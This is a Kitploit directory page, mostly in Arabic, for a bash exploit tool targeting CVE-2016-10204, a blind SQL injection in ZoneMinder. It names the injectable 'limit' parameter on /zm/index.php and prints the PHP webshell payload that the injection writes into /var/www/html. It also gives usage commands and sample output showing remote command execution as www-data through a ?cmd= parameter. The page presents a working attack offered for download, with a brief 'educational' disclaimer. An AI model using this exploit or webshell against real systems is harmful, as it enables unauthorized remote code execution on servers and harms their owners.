Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2016-10204_Webshell — سكربت bash يوضح الاستغلال اليدوي لثغرة CVE-2016-10204 ضد نقطة نهاية مستهدفة، مما يؤدي إلى رفع webshell بلغة PHP. | Kitploit
أدوات/GitHubGitHub/0xnullcomet/cve-2016-10204_webshell
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHub0xnullcomet/cve-2016-10204_webshell

CVE-2016-10204_Webshell

سكربت bash يوضح الاستغلال اليدوي لثغرة CVE-2016-10204 ضد نقطة نهاية مستهدفة، مما يؤدي إلى رفع webshell بلغة PHP.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

CVE-2016-10204_Webshell

سكريبت bash يوضح الاستغلال اليدوي لثغرة CVE-2016-10204 ضد نقطة نهاية مستهدفة، مما يؤدي إلى رفع غلاف ويب PHP.

حاليًا، المتغير الخاص بـ webshell مضبوط لحمولة MySQL. يمكن استبداله بأي خلفية تحتاج استهدافها.

مزيد من المعلومات حول هذه الثغرة يمكن العثور عليه في المصادر التالية:

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10204
  • https://www.exploit-db.com/exploits/41239
  • https://www.openwall.com/lists/oss-security/2017/02/05/1

يعمل هذا السكريبت بعدة طرق:

  • يأخذ عنوان URL مستهدف بصيغة التعبير المنتظم التالية ^(http|https)://[^/]+/zm/index\.php$
    • مثال: http://192.168.10.100/zm/index.php
  • يتحقق من عدم وجود غلاف ويب بالفعل في عنوان URL المستهدف واللاحقة المحددة لعنوان URL لغلاف الويب
    • إذا كان موجودًا، لا يقوم بالاستغلال مرة أخرى.
    • إذا لم يكن موجودًا، يستمر.
  • ينشئ طلب POST ضار إلى نقطة النهاية /zm/index.php?view=request&request=log&task=query&limit=100&minTime=1466674406.084434
    • يحتوي هذا الطلب على نقطة حقن في المعامل &limit=100 والتي نستغلها للقيام بالتالي:
    • إنشاء ملف غلاف ويب جديد داخل /var/www/html
    • SELECT للسلسلة النصية <?php system($_GET['cmd']);?> INTO هذا الملف (نقوم ببثها في الملف أثناء كتابته)
  • يتحقق من إنشاء غلاف الويب المرفوع وإمكانية الوصول إليه في عنوان URL الذي تم إنشاؤه.
  • يقدم دليلاً على ذلك عن طريق تنفيذ الأمر id وعرض مخرجاته.

Usage:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php

General Usage:
/bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target_endpoint/zm/index.php>

Help:


Example:

root@kitploit:~

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Target Host: 192.168.177.52:3305          [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Attempting webshell deployment. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23

[*]================================[*]
[*]Webshell deployment successful. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]


Rerunning against an already exploited target:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Target Host: 192.168.177.52:3305          [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Webshell already deployed.      [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]


Included help:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
A bash script demonstrating the manual exploitation of CVE-2016-10204 against a target endpoint,
leading to upload of a php webshell.

More information:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1

Usage:
  /bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target/zm/index.php>

Example:
  /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

Notes:
- Verifies if a webshell already exists before attempting exploitation.
- Constructs a malicious SQLi payload to write a PHP webshell into /var/www/html.
- Confirms deployment by executing 'id' via the ?cmd= parameter.
- Please use responsibly only against devices you have permission to do. This is for educational purposes only.

تنزيل الأداة